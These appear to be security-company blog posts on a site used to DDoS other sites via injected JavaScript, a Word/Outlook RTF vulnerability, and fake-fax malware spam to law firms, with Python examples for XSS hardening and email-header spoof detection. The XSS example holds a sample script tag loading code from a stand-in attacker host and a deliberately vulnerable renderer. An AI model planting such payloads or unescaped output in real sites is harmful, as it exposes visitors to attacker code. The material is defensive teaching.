
Large website used to attack other websites

As a player in the website security space, we frequently come across research from other organizations, and we like to bring it to your attention so you learn more about the cybercriminals who want to infect your website with malware for their own purposes.

In research published by Incapsula (http://www.incapsula.com/blog/world-largest-site-xss-ddos-zombies.html), a website ranked in Alexa’s Top 50 was found to be serving attacker-injected JavaScript, planted through a cross-site scripting (XSS) flaw, that made its visitors’ browsers launch DDoS (Distributed Denial of Service) attacks against other websites. The site itself stayed up; its visitors became the attack traffic.

As usual, you might ask, “Tom, why is this website security news important to me?”

It’s important that you understand why hackers want your website, and why website malware is so prevalent. Yes, even if yours is a small blog that only covers events in your local community. Any website with visitors can be put to work in their money-making schemes. In this case, the compromised site served a script that Incapsula saw in an attack

“which flooded our client with over 20 million GET requests originating from the browsers of over 22,000 Internet users”

The report, which gets a little technical, also notes that the injected code keeps track of the attack traffic, apparently for billing purposes. Yet another income stream for cybercriminals.
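As an added illustration (not code from Incapsula’s report or from this site), the Python below shows the defect that makes this kind of attack possible and its fix: a profile page that inserts stored user text into its HTML unchanged, beside the same page with output encoding and a Content-Security-Policy header. The stored payload and the attacker host in it are made-up placeholders, not taken from the report.

```python
import html
from typing import Dict, Tuple

# Constructed sample input: a profile field an attacker saved on the site, carrying
# the kind of injected <script> the Incapsula report describes. The host name is a
# hypothetical placeholder, not taken from the report.
STORED_DISPLAY_NAME = '<script src="https://attacker.example/flood.js"></script>'

PAGE_TEMPLATE = '<div class="profile"><h2>{name}</h2></div>'


def render_profile_vulnerable(display_name: str) -> str:
    """Stored XSS: user-controlled text is dropped into the page unchanged, so any
    <script> the attacker saved once is delivered to every visitor who views it."""
    return PAGE_TEMPLATE.format(name=display_name)


def render_profile_hardened(display_name: str) -> str:
    """Output encoding: characters that can open a tag or attribute become HTML
    entities, so the browser displays the text instead of executing it."""
    return PAGE_TEMPLATE.format(name=html.escape(display_name, quote=True))


def hardened_response(display_name: str) -> Tuple[Dict[str, str], str]:
    """Defence in depth: besides escaping, send a Content-Security-Policy that only
    allows scripts from the site's own origin, so a script slipped in through some
    other bug still cannot be fetched from an attacker-controlled host."""
    headers = {
        "Content-Type": "text/html; charset=utf-8",
        "Content-Security-Policy": "default-src 'self'; script-src 'self'",
    }
    return headers, render_profile_hardened(display_name)


def contains_script_tag(page: str) -> bool:
    """Crude check used only to contrast the two renderers: a live <script tag in
    the output means every visitor's browser would run the attacker's code."""
    return "<script" in page.lower()


if __name__ == "__main__":
    for label, renderer in (("vulnerable", render_profile_vulnerable),
                            ("hardened", render_profile_hardened)):
        page = renderer(STORED_DISPLAY_NAME)
        print(f"{label:10s} script tag present: {contains_script_tag(page)}")
        print("           ", page)
```

Escaping at output time is what fixes the bug; the policy header is a second line of defence that limits the damage if another injection point is missed, and it is only as strong as the `script-src` list, so keep third-party script hosts out of it wherever you can.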

The hackers could be offering this as a service, charging a fee for each attack.

If you have questions about this, please ask in the comment section.

Thank you.


Previewing Outlook messages can lead to infected computer

Microsoft has published a security advisory for a vulnerability in Microsoft Word that is being exploited in targeted attacks against Word 2010. For those of you who aren’t intimately familiar with Microsoft Office products: Outlook 2007, Outlook 2010 and Outlook 2013 use Microsoft Word as their default email reader, so the flaw reaches you through email as well as through Word documents.

https://technet.microsoft.com/en-us/security/advisory/2953095

If you’re using Microsoft Outlook as your email program, this could affect you.

Why would a company dedicated to website security make you aware of this?

This particular vulnerability allows remote code execution on your local computer. If an attacker sends you a carefully crafted email message in RTF (Rich Text Format), merely previewing it in Outlook, which hands the RTF to Word to render, can run the attacker’s code on your computer, which means your computer could be infected. You do not have to open an attachment or click a link.

We want to bring this to your attention so that you keep all your software updated and install Microsoft’s fix as soon as it ships; until then, the workarounds in the advisory (reading email in plain text, or blocking RTF files in Word) reduce the risk. If your local computer gets infected, the hackers can steal the login credentials for your hosting account and your CMS (WordPress, Joomla, etc.), log in, and infect your website.

We are concerned with your website security, but that means being concerned about your local computer’s security as well.

We’ve said this before, and Microsoft’s announcement makes it explicit: an attacker who succeeds gets the same rights as the currently logged-in user. If you log in to your local computer as an administrator, guess what? The hacker will be an administrator too. In the advisory’s words:

“An attacker who successfully exploited this vulnerability could gain the same user rights as the current user.”

Create a separate standard “user” account on your computer for day-to-day work. A standard user cannot install programs. When you need to install something, log out of that account, log in as administrator, install the software, log out again, log back in as the standard user and carry on with your normal activity. (On Windows Vista and later you can instead right-click the installer and choose “Run as administrator”, which asks for the administrator password without logging you out.)

Yes, this is less convenient, but so is having your computer compromised.

Always keep your local computer software updated. This helps us keep your website security at the highest level.

Please post a comment if you find this helpful. Tweet this to your friends and family.


SPAM for law firms

Since we started offering our VPS and dedicated server software, we’ve been handling many SPAM issues for clients, outgoing as well as incoming.

One recent rash of SPAM seems to target law firms. Others are surely receiving these too, but in our experience they have mostly been sent to law firms.

The scenario begins with an email with a subject line like:

New Fax: 2 pages

The body of the message will be something like:

Scanned from MFP61725171 by (domain of recipient).com
Date: Tue, 1 Apr 2014 20:17:54 +0800
Pages: 2
Resolution: 200×200 DPI

It looks like an internal fax. The sender (From:) is usually shown as fax@(domain of recipient).com, and the number of pages varies from message to message.

The email carries an attachment, typically a .zip file, which holds the actual malware. Do not open it.

When we look at the headers, here’s what we see:

Return-path:

Envelope-to: willie.james@(domain of recipient).com
Delivery-date: Mon, 31 Mar 2014 10:15:53 +0000
Received: from [106.79.10.18] (port=49927)
by server.(server for client).com with esmtp (Exim 4.82)
(envelope-from )
id 1WUZFv-0005zC-8e; Mon, 31 Mar 2014 10:15:53 +0000
Received: from 289-SN2MPN2-345.582d.mgd.msft.net ([106.79.10.18]) by
115-SN2MMR2-207.895d.mgd.msft.net ([106.79.10.18]) with mapi id
14.03.0563.358; Mon, 31 Mar 2014 15:45:51 +0530
Message-ID:
<6BY1VKL42LR58X56ARUF4VNG59U3YS6B@316-SN2MPN2-342.397d.mgd.msft.net>
From: "FAX"
To: john.assistant@(domain of recipient).com

Subject: New Fax : 5 pages
Thread-Topic: New Fax : 5 pages
Thread-Index: 9P7N7EWX4M3T3HCICOQW==
Date: Mon, 31 Mar 2014 15:45:51 +0530
Message-ID:

Accept-Language: en-US
Content-Language: en-US
Content-Type: multipart/mixed;
boundary="----=_Part_49160_3775187661.5707552433783"
X-MS-Has-Attach: yes
X-MS-Exchange-Organization-SCL: -1
X-MS-TNEF-Correlator:

MIME-Version: 1.0
X-MS-Exchange-Organization-AuthSource: 092-SN2MMR2-965.296d.mgd.msft.net
X-MS-Exchange-Organization-AuthAs: Internal
X-MS-Exchange-Organization-AuthMechanism: 09
X-Originating-IP: [106.79.10.18]
X-MS-Exchange-Organization-AVStamp-Mailbox: MSFTFF;1;0;0 0 0
X-Auto-Response-Suppress: DR, RN, NRN, OOF, AutoReply
X-Spam-Status: No, score=3.0
X-Spam-Score: 30
X-Spam-Bar: +++
X-Ham-Report: Spam detection software, running on the system
"server.(server for client).com", has
identified this incoming email as possible spam. The original message
has been attached to this so you can view it (if it isn't spam) or label
similar future email. If you have any questions, see
root\@localhost for details.

Content preview: You have received a new fax (fax-954672.zip). Date/Time:
Mon,
31 Mar 2014 15:45:51 +0530. Number of pages:5 [...]

Here the spammers are spoofing the From address so the message looks like an internal fax-to-email notification. Note also that the spam filter scored it only 3.0 (X-Spam-Status: No), under its threshold, which is why it was delivered to the inbox.

This line tells us it did not originate internally:
Received: from [106.79.10.18] (port=49927)

It is the top-most Received line, the one our own Exim server added when the remote system connected, so the address in it is the real peer and the sender cannot forge it. Everything below it in the header list, including the second Received line with the Microsoft-looking hostnames and the X-MS-Exchange-Organization-AuthAs: Internal header, arrived inside the message and was written by the spammer. According to whois.domaintools.com (an awesome service, you should subscribe!) that IP address is in India, while our client, and any fax machine of theirs, is in the United States. Therefore we know it was fake. Publishing an SPF record for your domain and configuring your mail server to reject messages that claim to be from your own domain unless the sender authenticated would have stopped this at the door.
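As an added example (not a tool from this site), here is a small Python script that applies the same reasoning to a constructed copy of the headers above: it takes the connecting IP only from the Received line our own server wrote, checks whether a From address in the client’s domain actually came from the client’s own networks, notes forged Exchange headers, and reads the spam score. The domain, server name, internal network range and the two addresses the page shows blank are placeholders.

```python
import ipaddress
import re
from email import message_from_string
from email.message import Message
from email.utils import parseaddr
from typing import List, Optional

# Constructed sample modelled on the headers quoted above: the client's domain is
# replaced by example.com, the server by server.example.com, and the addresses the
# page shows blank (Return-path, envelope-from) are filled with a placeholder.
# The connecting IP 106.79.10.18 and the header names are as shown on the page.
SAMPLE_HEADERS = """\
Return-path: <fax@example.com>
Received: from [106.79.10.18] (port=49927)
    by server.example.com with esmtp (Exim 4.82)
    (envelope-from <fax@example.com>)
    id 1WUZFv-0005zC-8e; Mon, 31 Mar 2014 10:15:53 +0000
Received: from 289-SN2MPN2-345.582d.mgd.msft.net ([106.79.10.18]) by
    115-SN2MMR2-207.895d.mgd.msft.net ([106.79.10.18]) with mapi id
    14.03.0563.358; Mon, 31 Mar 2014 15:45:51 +0530
From: "FAX" <fax@example.com>
To: john.assistant@example.com
Subject: New Fax : 5 pages
X-MS-Exchange-Organization-AuthAs: Internal
X-Originating-IP: [106.79.10.18]
X-Spam-Status: No, score=3.0
X-Spam-Score: 30

"""

CLIENT_DOMAIN = "example.com"           # placeholder for "(domain of recipient).com"
OUR_SERVER = "server.example.com"       # placeholder for "server.(server for client).com"
INTERNAL_NETWORKS = ["203.0.113.0/24"]  # placeholder for the client's own (US) address space

IPV4_IN_BRACKETS = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def parse_sample() -> Message:
    return message_from_string(SAMPLE_HEADERS)


def received_lines(msg: Message) -> List[str]:
    """Received headers, most recent hop first, with folding whitespace collapsed."""
    return [" ".join(value.split()) for value in msg.get_all("Received", [])]


def connecting_ip(msg: Message, our_server: str) -> Optional[str]:
    """IP from the first Received line written by our own server.

    Each hop prepends its Received line, so the topmost one naming our server is
    the one it wrote itself and records the real TCP peer. Everything below it
    (the second Received line, the X-MS-Exchange-* headers) arrived inside the
    message and can be forged by the sender.
    """
    for line in received_lines(msg):
        if f" by {our_server} " in line:
            match = IPV4_IN_BRACKETS.search(line)
            return match.group(1) if match else None
    return None


def claims_internal_sender(msg: Message, domain: str) -> bool:
    """True when From: uses the recipient's own domain, as the fake fax does."""
    address = parseaddr(msg.get("From", ""))[1]
    return address.lower().endswith("@" + domain.lower())


def from_internal_network(ip: str, networks: List[str]) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in ipaddress.ip_network(net) for net in networks)


def spam_score(msg: Message) -> Optional[float]:
    """SpamAssassin's score from X-Spam-Status; 'No' means it stayed under the
    filter's threshold, which is why this message reached the inbox."""
    match = re.search(r"score=(-?\d+(?:\.\d+)?)", msg.get("X-Spam-Status", ""))
    return float(match.group(1)) if match else None


def spoofed_internal_fax(msg: Message, domain: str, our_server: str,
                         networks: List[str]) -> List[str]:
    """Reasons the message is a spoof; an empty list means nothing suspicious."""
    ip = connecting_ip(msg, our_server)
    if ip is None:
        return ["no Received line written by our own server; chain cannot be trusted"]
    if from_internal_network(ip, networks):
        return []
    reasons = []
    if claims_internal_sender(msg, domain):
        reasons.append(f"From: claims @{domain} but the connection came from {ip}, "
                       "outside our networks")
    if msg.get("X-MS-Exchange-Organization-AuthAs", "").strip().lower() == "internal":
        reasons.append("AuthAs: Internal on a message from outside: that header was "
                       "written by the sender, not by any server we run")
    return reasons


if __name__ == "__main__":
    message = parse_sample()
    print("connecting IP:", connecting_ip(message, OUR_SERVER))
    print("spam score:", spam_score(message))
    for reason in spoofed_internal_fax(message, CLIENT_DOMAIN, OUR_SERVER, INTERNAL_NETWORKS):
        print("-", reason)
```

The one rule the script encodes is the one that matters when reading headers by hand: trust only the Received lines added by servers you control, starting from the top, and treat every header below them as the sender’s claim.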

If you use Outlook for email, you can find out how to view the full headers by searching Google for “outlook view full headers”. If you use Outlook 2007, Outlook 2010, etc., narrow the search by adding your version. For instance, for Outlook 2007:

outlook 2007 view full headers

If you start getting these, just mark them as SPAM and move on with life. Your server is not infected, and neither is your local computer, as long as nobody opened the attachment.